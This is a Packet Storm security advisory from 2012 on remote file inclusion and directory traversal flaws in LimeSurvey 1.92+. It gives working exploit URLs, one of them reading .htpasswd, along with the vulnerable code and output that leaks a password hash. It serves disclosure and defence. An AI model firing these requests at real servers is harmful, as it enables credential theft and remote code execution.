exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

LimeSurvey 1.92+ Build120620 Remote File Inclusion / Traversal

LimeSurvey 1.92+ Build120620 Remote File Inclusion / Traversal
Posted Jun 23, 2012
Authored by dun

LimeSurvey version 1.92+ Build 120620 suffers from remote file inclusion and traversal vulnerabilities.

tags | exploit, remote, vulnerability, code execution, file inclusion
SHA-256 | 43b9b487eafdbab47658da07aab4f8a2286ff8e53d69af4f8c40cae632fc2132

LimeSurvey 1.92+ Build120620 Remote File Inclusion / Traversal

Change Mirror Download
:::::::-.   ...    ::::::.    :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-06-22 ]
#################################################################
# [ LimeSurvey 1.92+ build 120620 ] Multiple Vulnerabilities #
#################################################################
#
# Script: "LimeSurvey - the free and open source survey software tool"
#
# Vendor: http://www.limesurvey.org/
# Download: http://download.limesurvey.org/Latest_stable_release/limesurvey192plus-build120620.zip
#
################################################################
#
# [RFI] ( allow_url_include = On; register_globals = On; )
#
# Versions affected: 1.92+ build 120620
#
# Vuln: http://localhost/limesurvey/replacements.php?rootdir=http://localhost/phpinfo.txt?

File: ./limesurvey/replacements.php (line 3)
...cut...
<?php
global $rootdir;
include_once($rootdir.'/classes/expressions/LimeExpressionManager.php'); // [RFI]
...cut...

################################################################
#
# [Directory Traversal] ( display_errors On; register_globals = On; )
#
# Versions affected: 1.92+ build 120620 and previous
#
# Vuln: http://localhost/limesurvey/admin/importsurvey.php?copyfunction=1&sExtension=lss&sFullFilepath=../../secret/.htpasswd

File: ./limesurvey/admin/importsurvey.php (lines 18-38)
...cut...
if ((!isset($importingfrom) && !isset($copyfunction)) || isset($_REQUEST['importingfrom'])) // 1 false if $copyfunction is set
{
die("Cannot run this script directly");
}
require_once('import_functions.php'); // 2 include functions

if (!isset($copyfunction))
{
$sFullFilepath=$the_full_file_path;
$aPathInfo = pathinfo($sFullFilepath);
$sExtension = $aPathInfo['extension'];
}

$bImportFailed=false;
if (isset($sExtension) && strtolower($sExtension)=='csv')
{
$aImportResults=CSVImportSurvey($sFullFilepath);
}
elseif (isset($sExtension) && strtolower($sExtension)=='lss') // 3 true if $sExtension = 'lss'
{
$aImportResults=XMLImportSurvey($sFullFilepath,null,null, null,(isset($_POST['translinksfields']))); // 4 $sFullFilepath -> our file
...cut...

File: ./limesurvey/admin/import_functions.php (lines 1080-1087)
...cut...
function XMLImportSurvey($sFullFilepath,$sXMLdata=NULL,$sNewSurveyName=NULL,$iDesiredSurveyId=NULL, $bTranslateInsertansTags=true)
{
global $connect, $dbprefix, $clang, $timeadjust;

$results['error']=false;
if ($sXMLdata == NULL)
{
$xml = simplexml_load_file($sFullFilepath); // 5 try to open our file as xmlfile
...cut...

This should return a warning with the first line of our file.
In this case: admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1kvc5/ from .htpasswd :)
Something like this:

Warning: simplexml_load_file() [function.simplexml-load-file]:
../../secret/.htpasswd:1:parser error : Start tag expected, '<' not found in /www/limesurvey/admin/import_functions.php on line 1087
Warning: simplexml_load_file() [function.simplexml-load-file]:
admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1kvc5/ in /www/limesurvey/admin/import_functions.php on line 1087
Warning: simplexml_load_file() [function.simplexml-load-file]:
^ in /www/limesurvey/admin/import_functions.php on line 1087

### [ dun / 2012 ] #####################################################

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close